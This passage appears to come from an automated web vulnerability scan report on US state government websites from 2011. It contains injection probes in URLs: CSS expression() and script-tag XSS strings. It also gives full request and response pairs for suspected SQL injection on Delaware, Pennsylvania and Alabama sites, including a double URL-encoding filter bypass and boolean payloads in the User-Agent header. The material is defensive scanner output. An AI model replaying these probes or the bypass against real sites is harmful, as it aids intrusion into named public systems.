30.176. http://kentucky.gov/_layouts/Authenticate.aspx

30.177. http://kodakgallery-kg.baynote.net/baynote/tags3/common

30.178. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard

30.179. http://landmark-project.com/feed2js/feed2js.php

30.180. http://maps.google.com/maps/api/js

30.181. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

30.182. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

30.183. http://mi.gov/favicon.ico

30.184. http://mi.gov/images/som/governor_309187_7.gif

30.185. http://mibid.bidcorp.com/Auctions/Files/Auction_28057/thumbnail/car1.jpg

30.186. http://mibid.bidcorp.com/Auctions/Files/Auction_28059/thumbnail/img_1345.jpg

30.187. http://mibid.bidcorp.com/Auctions/Files/Auction_28060/thumbnail/img_1353.jpg

30.188. http://mibid.bidcorp.com/Auctions/Files/Auction_28061/thumbnail/img_1354.jpg

30.189. http://mibid.bidcorp.com/Auctions/Files/Auction_28079/thumbnail/m3493a.jpg

30.190. http://mibid.bidcorp.com/Auctions/Files/Auction_28084/thumbnail/dvd1.jpg

30.191. http://mibid.bidcorp.com/Auctions/Files/Auction_28086/thumbnail/img_1031.jpg

30.192. http://mibid.bidcorp.com/Auctions/Files/Auction_28089/thumbnail/img_1034.jpg

30.193. http://mibid.bidcorp.com/Auctions/Files/Auction_28090/thumbnail/cam1.jpg

30.194. http://mibid.bidcorp.com/Auctions/Files/Auction_28092/thumbnail/misc1.jpg

30.195. https://moversguide.usps.com/icoa/flow.do

30.196. http://newbrowse.livehelper.com/servlet/a

30.197. http://nj.gov/nj/images/library/com/com_211_new2.gif

30.198. https://njmvcscheduling.state.nj.us/tc/driverlogin.do

30.199. http://nv.gov/RSSFeed.aspx

30.200. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png

30.201. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png

30.202. http://oregon.gov/js/oc-resources/marquee.js

30.203. https://pixel.fetchback.com/serve/fb/pdc

30.204. https://seal.verisign.com/getseal

30.205. http://serverapi.arcgisonline.com/jsapi/arcgis/

30.206. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm

30.207. http://shots.snap.com/snap_shots.js

30.208. http://thumbnail.api.livestream.com/thumbnail

30.209. http://tn.gov/includes/alert/alert.shtml

30.210. https://treas-secure.treas.state.mi.us/eservice_enu/images/mich_2.gif

30.211. http://twitter.com/statuses/user_timeline/IDAHOgov.json

30.212. http://urls.api.twitter.com/1/urls/count.json

30.213. http://wbtdcs.nara.gov/wtid.js

30.214. https://www.accesskansas.org/favicon.ico

30.215. http://www.alabama.gov/portal/common/subNav.jsp

30.216. http://www.colorado.gov/cs/Satellite

30.217. http://www.coloradochannel.net/sites/all/themes/cochannel/webfontkit/metaplus_bold_caps-webfont.woff

30.218. http://www.coloradochannel.net/sites/all/themes/cochannel/webfontkit/metaplus_medium_caps-webfont.woff

30.219. http://www.delaware.gov/images/favicon.ico

30.220. http://www.delaware.gov/pipe/logos/blog_blog_gis.gif

30.221. http://www.ehawaii.gov/dakine/favicon.ico

30.222. http://www.employment.oregon.gov/js/oc-resources/marquee.js

30.223. http://www.georgiawildlife.com/favicon.ico

30.224. http://www.hoosierdata.in.gov/nav.asp

30.225. http://www.in.gov/dwd/2217.js

30.226. http://www.kansas.gov/favicon.ico

30.227. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm

30.228. http://www.michigan.gov/favicon.ico

30.229. http://www.michigan.gov/images/Banner_81725_7.jpg

30.230. http://www.michigan.gov/images/E-file_81726_7.jpg

30.231. http://www.michigan.gov/images/FAQs_81728_7.jpg

30.232. http://www.michigan.gov/images/Forms_81729_7.jpg

30.233. http://www.mo.gov/wp-content/themes/Mo.gov/bavicon.ico

30.234. http://www.mo.gov/wp-content/uploads/2011/04/CW150_logo.gif

30.235. http://www.ms.gov/a

30.236. http://www.ms.gov/favicon.ico

30.237. http://www.ms.gov/how_do_i_fulllist.jsp

30.238. http://www.ms.gov/how_do_i_sub_answer_page.jsp

30.239. http://www.ms.gov/images/hdr_

30.240. http://www.ms.gov/images/hdr_'

30.241. http://www.ms.gov/images/hdr_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.242. http://www.ms.gov/images/hdr_46e740

30.243. http://www.ms.gov/images/hdr_featured_sites_

30.244. http://www.ms.gov/images/hdr_featured_sites_'

30.245. http://www.ms.gov/images/hdr_featured_sites_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.246. http://www.ms.gov/images/hdr_featured_sites_46e740

30.247. http://www.ms.gov/images/hdr_how_do_i_

30.248. http://www.ms.gov/images/hdr_how_do_i_'

30.249. http://www.ms.gov/images/hdr_how_do_i_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.250. http://www.ms.gov/images/hdr_how_do_i_46e740

30.251. http://www.ms.gov/images/hdr_online_services_

30.252. http://www.ms.gov/images/hdr_online_services_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

30.253. http://www.ms.gov/images/hdr_online_services_46e740

30.254. http://www.ms.gov/ms_sub_sub_template.jsp

30.255. http://www.ms.gov/pics/amlogo.gif

30.256. http://www.nh.gov/favicon.ico

30.257. http://www.nist.gov/favicon.ico

30.258. http://www.nist.gov/style/web_fonts/functionpro_medium_macroman/FunctionPro-Medium-webfont.woff

30.259. http://www.ri.gov/favicon.ico

30.260. http://www.ri.gov/img/governmentbox/seal.gif

30.261. http://www.state.mn.us/mn/content_images/images/ExploreMN_Logo_nspallet_copy.jpg

30.262. http://www.state.mn.us/mn/content_images/images/ad_license-minnesota.jpg

30.263. http://www.state.mn.us/mn/content_images/images/governor-dayton_northstar-ad.jpg

30.264. https://www.tennesseeanytime.org/favicon.ico

30.265. https://www.tennesseeanytime.org/includes/alert/alert.shtml

30.266. http://www.tn.gov/css/fonts/aller_it-webfont.woff

30.267. http://www.tn.gov/css/fonts/aller_lt-webfont.woff

30.268. http://www.tn.gov/css/fonts/aller_rg-webfont.woff

30.269. http://www.tn.gov/includes/alert/alert.shtml

30.270. http://www.utah.gov/keywordsearch/applicationcount.html

30.271. http://www.utah.gov/locationaware/ipLookUp.html

30.272. http://www.utah.gov/whatsnew/files/image-4739

30.273. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css

30.274. http://www.visitflorida.com/includes/js/footerSurvey.php

30.275. http://www.vitalchek.com/js/google_analytics_js.aspx

30.276. https://www.vitalchek.com/AjaxFAQServer.aspx

30.277. https://www.vitalchek.com/AjaxOrderStepServer.aspx

30.278. https://www.vitalchek.com/VitalChekStaticContent/images/Portal/VitalChek/background/orderPageRtPanelBlank.gif

30.279. https://www.vitalchek.com/js/google_analytics_js.aspx

30.280. https://www.vitalchek.com/order_step_js.aspx

30.281. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp

31. Content type is not specified

31.1. http://newchat.livehelper.com/servlet/lhChat

31.2. http://sc.gov/Pages/images/ajax-loader.gif

31.3. http://sc.gov/_catalogs/masterpage/custom_functions.js

31.4. http://server.iad.liveperson.net/hc/33511087/

31.5. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

31.6. http://tomcat2.dot.state.ga.us/favicon.ico

31.7. https://www.accesskansas.org/uccsearch/index.html

31.8. http://www.osc.state.ny.us/redirect_social.php



1. SQL injection  next
There are 10 instances of this issue:


1.1. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The hdn_Language parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hdn_Language parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /PGM/ASP/SC020.asp?hdn_Language=EN'&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:46:53 GMT; path=/
Date: Sat, 30 Apr 2011 01:14:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 13487
Content-Type: text/html
Expires: Sat, 30 Apr 2011 01:14:26 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html LANG="EN">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTENT
...[SNIP]...

Request 2

GET /PGM/ASP/SC020.asp?hdn_Language=EN''&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:46:55 GMT; path=/
Date: Sat, 30 Apr 2011 01:14:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10617
Content-Type: text/html
Expires: Sat, 30 Apr 2011 01:14:30 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

1.2. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_2966_368351_43/http [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24662_2966_368351_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://pa.gov/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304079887496
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166287496
Content-Type: text/html; charset=utf-8
Content-Length: 33559

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_24662_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://pa.gov:80/portal/server.pt/gateway%27%27/PTARGS_0_2_24662_2966_368351_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.3. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24825_2966_368351_43/http [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24825_2966_368351_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /portal/server.pt/gateway%2527/PTARGS_0_2_24825_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://pa.gov/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304079886386
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166286386
Content-Type: text/html; charset=utf-8
Content-Length: 33558

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_24825_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://pa.gov:80/portal/server.pt/gateway%27%27/PTARGS_0_2_24825_2966_368351_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.4. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24879_2966_368351_43/http [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24879_2966_368351_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /portal/server.pt/gateway'/PTARGS_0_2_24879_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://pa.gov/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304079883339
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166283339
Content-Type: text/html; charset=utf-8
Content-Length: 33559

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway''/PTARGS_0_2_24879_2966_368351_43/http HTTP/1.1
Host: pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://pa.gov:80/portal/server.pt/gateway''/PTARGS_0_2_24879_2966_368351_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 358

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.5. http://www.alabama.gov/portal/index.jsp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'%20and%201%3d1--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:15:53 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; path=/
Content-Type: text/html
Content-Length: 34766


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://media.alabama.gov/AgencyTemplates/ado/template_redirect.aspx?ID=4998&amp;t=3' target="_blank">Hiring Starts to Pick Up Pace </a>

<br />


        <a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://governor.alabama.gov/news/news_detail.aspx?ID=4999&amp;t=1' target="_blank">Governor Bentley Announces Approval of Federal Disaster...</a>

<br />


</div>
                   </td>
<td>&nbsp;</td>
                   <td>
                       <div class="footer_links">

<img src="/images/trans_spanish.gif" alt="alabama.gov en Espanol" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|es&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Spanish</a><br />
<img src="/images/trans_german.gif" alt="alabama.gov auf Deutsch" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|de&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">German</a><br />
<img src="/images/trans_korean.gif" alt="Korean alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ko&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Korean</a><br />
<img src="/images/trans_japanese.gif" alt="Japanese alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ja&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Japanese</a>

                       </div>
                   </td>
                   <td>
   <div class="footer_links">
                           


...[SNIP]...

Request 2

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'%20and%201%3d2--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:15:50 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abc3n9TTHLjN--MCD_J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://governor.alabama.gov/news/news_detail.aspx?ID=5002&amp;t=1' target="_blank">Insurers Open Several Mobile Claims Offices</a>

<br />


        <a href='http://www.alabama.gov/sliverheader/Welcome.do?url=http://governor.alabama.gov/news/news_detail.aspx?ID=5000&amp;t=1' target="_blank">Governor Bentley Opens Recovery Response Call Center </a>

<br />


</div>
                   </td>
<td>&nbsp;</td>
                   <td>
                       <div class="footer_links">

<img src="/images/trans_spanish.gif" alt="alabama.gov en Espanol" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|es&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Spanish</a><br />
<img src="/images/trans_german.gif" alt="alabama.gov auf Deutsch" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|de&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">German</a><br />
<img src="/images/trans_korean.gif" alt="Korean alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ko&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Korean</a><br />
<img src="/images/trans_japanese.gif" alt="Japanese alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ja&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Japanese</a>

                       </div>
                   </td>
                   <td>
   <div class="footer_links">
                           







...[SNIP]...

1.6. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_38668_4566_458236_43/http [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/gateway/PTARGS_0_2_38668_4566_458236_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /portal/server.pt/gateway'/PTARGS_0_2_38668_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://www.budget.state.pa.us/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304080198730
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166598730
Content-Type: text/html; charset=utf-8
Content-Length: 26799

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway''/PTARGS_0_2_38668_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 2

HTTP/1.1 302 Found
Connection: close
